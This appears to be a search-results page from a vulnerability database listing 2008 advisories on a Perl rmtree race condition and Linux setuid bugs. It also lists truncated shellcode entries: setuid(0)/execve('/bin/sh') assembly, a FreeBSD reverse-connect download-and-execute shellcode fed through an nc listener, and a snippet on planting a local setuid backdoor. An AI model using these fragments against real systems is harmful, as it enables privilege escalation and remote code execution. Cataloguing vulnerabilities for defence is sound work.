Lucene search
+L

3301 matches found

UbuntuCve
UbuntuCve
added 2008/12/01 5:30 p.m.27 views

CVE-2008-5302

Race condition in the rmtree function in File::Path 1.08 and 2.07 lib/File/Path.pm in Perl 5.8.8 and 5.10.0 allows local users to create arbitrary setuid binaries via a symlink attack, a different vulnerability than CVE-2005-0448, CVE-2004-0452, and CVE-2008-2827. NOTE: this is a regression error...

6.9CVSS5.8AI score0.00332EPSS
SaveExploits2References2
Prion
Prion
added 2008/12/01 5:30 p.m.26 views

Race condition

Race condition in the rmtree function in File::Path 1.08 and 2.07 lib/File/Path.pm in Perl 5.8.8 and 5.10.0 allows local users to create arbitrary setuid binaries via a symlink attack, a different vulnerability than CVE-2005-0448, CVE-2004-0452, and CVE-2008-2827. NOTE: this is a regression error...

6.9CVSS6.1AI score0.00843EPSS
SaveExploits6References22
Debian CVE
Debian CVE
added 2008/12/01 5:0 p.m.53 views

CVE-2008-5302

Race condition in the rmtree function in File::Path 1.08 and 2.07 lib/File/Path.pm in Perl 5.8.8 and 5.10.0 allows local users to create arbitrary setuid binaries via a symlink attack, a different vulnerability than CVE-2005-0448, CVE-2004-0452, and CVE-2008-2827. NOTE: this is a regression error...

6.9CVSS5AI score0.00332EPSS
SaveExploits2
Cvelist
Cvelist
added 2008/12/01 5:0 p.m.38 views

CVE-2008-5302

Race condition in the rmtree function in File::Path 1.08 and 2.07 lib/File/Path.pm in Perl 5.8.8 and 5.10.0 allows local users to create arbitrary setuid binaries via a symlink attack, a different vulnerability than CVE-2005-0448, CVE-2004-0452, and CVE-2008-2827. NOTE: this is a regression error...

7.8AI score0.00332EPSS
SaveExploits2References22
FreeBSD
FreeBSD
added 2008/11/28 12:0 a.m.29 views

p5-File-Path -- rmtree allows creation of setuid files

Jan Lieskovsky reports: perl-File-Path rmtree race condition CVE-2005-0448 was assigned to address this This vulnerability was fixed in 5.8.4-7 but re-introduced in 5.8.8-1. It's also present in File::Path 2.xx, up to and including 2.07 which has only a partial fix...

1.2CVSS6.1AI score0.00384EPSS
SaveExploits0References3
RedHat Linux
RedHat Linux
added 2008/11/19 1:43 p.m.76 views

Important: Red Hat Security Advisory: kernel security and bug fix update

Updated kernel packages that resolve several security issues and fix various bugs are now available for Red Hat Enterprise Linux 4. This update has been rated as having important security impact by the Red Hat Security Response Team. The kernel packages contain the Linux kernel, the core of any...

5.5CVSS6.2AI score0.02141EPSS
SaveExploits11References19
RedHat Linux
RedHat Linux
added 2008/11/19 1:43 p.m.5 views

kernel: open() call allows setgid bit when user is not in new file's group

fs/open.c in the Linux kernel before 2.6.22 does not properly strip setuid and setgid bits when there is a write to a file, which allows local users to gain the privileges of a different group, and obtain sensitive information or possibly have unspecified other impact, by creating an executable...

4.6CVSS7.1AI score0.02141EPSS
SaveExploits3References4
seebug.org
seebug.org
added 2008/11/15 12:0 a.m.18 views

linux/x86 setuid(0) & execve(/bin/sh,0,0) shellcode 27 bytes

No description provided by source. ----------- C Source Code ----------- / Smallest GNU/Linux x86 setuid0 && execve"/bin/sh",0,0 Shellcode without NULLs Coded by Chema Garcia aka sch3m4 + [email protected] + http://opensec.es Shellcode Size: 27 bytes Date: 13/11/2008 / include stdio.h const char...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2008/11/13 12:0 a.m.22 views

linux/x86 setuid(0) & execve(/bin/sh 0 0) shellcode 28 bytes

No description provided by source. -------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve"/bin/sh",0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f lea eax,ecx+0Bh mov ebx,esp int 80h...

7.1AI score
SaveExploits0
zdt
zdt
added 2008/11/13 12:0 a.m.21 views

linux/x86 setuid(0) & execve(/bin/sh,0,0) shellcode 28 bytes

Exploit for linux/x86 platform in category shellcode ============================================================ linux/x86 setuid0 & execve/bin/sh,0,0 shellcode 28 bytes ============================================================ -------------------ASM---------------------- global start section...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2008/11/13 12:0 a.m.30 views

linux/x86 setuid0 & execve/bin/sh,0,0 shellcode 28 bytes

linux/x86 setuid0 & execve/bin/sh,0,0 shellcode 28 bytes. Shellcode exploit for linx86 platform -------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve"/bin/sh",0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f...

7.4AI score
SaveExploits0
myhack58
myhack58
added 2008/10/18 12:0 a.m.25 views

A stack overflow attack and the anti-vulnerability warning-the black bar safety net

Overflow is the security of the network is often a contact to a problem, once there is some kind of overflow vulnerability, the network of thousands of computers will become a Hacker brothers and sisters on the chopping block of meat. Then the overflow in the end is what? This attack method...

0.6AI score
SaveExploits0
Positive Technologies
Positive Technologies
added 2008/10/03 12:0 a.m.4 views

PT-2008-5180 · Linux +1 · Linux Kernel +1

Name of the Vulnerable Software and Affected Versions: Linux kernel versions prior to 2.6.19 Description: The issue allows local users to gain the privileges of a different group, and obtain sensitive information or possibly have unspecified other impact, by splicing into an inode in order to...

7.1CVSS6.3AI score0.03209EPSS
SaveExploits7References174
NVD
NVD
added 2008/09/29 5:17 p.m.24 views

CVE-2008-4210

fs/open.c in the Linux kernel before 2.6.22 does not properly strip setuid and setgid bits when there is a write to a file, which allows local users to gain the privileges of a different group, and obtain sensitive information or possibly have unspecified other impact, by creating an executable...

4.6CVSS6.1AI score0.02141EPSS
SaveExploits3References31
UbuntuCve
UbuntuCve
added 2008/09/29 5:17 p.m.41 views

CVE-2008-4210

fs/open.c in the Linux kernel before 2.6.22 does not properly strip setuid and setgid bits when there is a write to a file, which allows local users to gain the privileges of a different group, and obtain sensitive information or possibly have unspecified other impact, by creating an executable...

4.6CVSS7AI score0.02141EPSS
SaveExploits3References2
myhack58
myhack58
added 2008/09/17 12:0 a.m.22 views

under linux to stay Local the back door of the two methods-vulnerability warning-the black bar safety net

Method one: setuid method, in fact, 8 is very secluded. Look at the process: root@localdomain lib ls-l |grep ld-linux lrwxrwxrwx 1 root root 9 2008-06-07 1 7:3 2 ld-linux. so. 2 - ld-2.7. so lrwxrwxrwx 1 root root 1 3 2008-06-07 1 7:4 7 ld-lsb. so. 3 - ld-linux. so. 2 root@localdomain lib chmod +...

0.2AI score
SaveExploits0
seebug.org
seebug.org
added 2008/09/10 12:0 a.m.21 views

freebsd/x86 rev connect, recv, jmp, return results 90 bytes

No description provided by source. / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 shellcodeinfile ; setuid0; socket; connect; dups; recv; jmp; exit; ; 90...

7.1AI score
SaveExploits0
zdt
zdt
added 2008/09/05 12:0 a.m.32 views

freebsd/x86 rev connect, recv, jmp, return results 90 bytes

Exploit for freebsd/x86 platform in category shellcode =========================================================== freebsd/x86 rev connect, recv, jmp, return results 90 bytes =========================================================== / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exi...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2008/09/05 12:0 a.m.38 views

freebsd/x86 rev connect, recv, jmp, return results 90 bytes

freebsd/x86 rev connect, recv, jmp, return results 90 bytes. Shellcode exploit for freebsdx86 platform / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 pls ex...

SaveExploits0
seebug.org
seebug.org
added 2008/09/05 12:0 a.m.13 views

freebsd/x86 rev connect recv jmp return results 90 bytes

No description provided by source. / ; sm4x - 2008 ; reverse connect dlshellcode and execute, exit ; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ; ; - feed it with a $nc -vvl -p8000 shellcodeinfile ; setuid0; socket; connect; dups; recv; jmp; exit; ; 90...

7.1AI score
SaveExploits0
Rows per page
Query Builder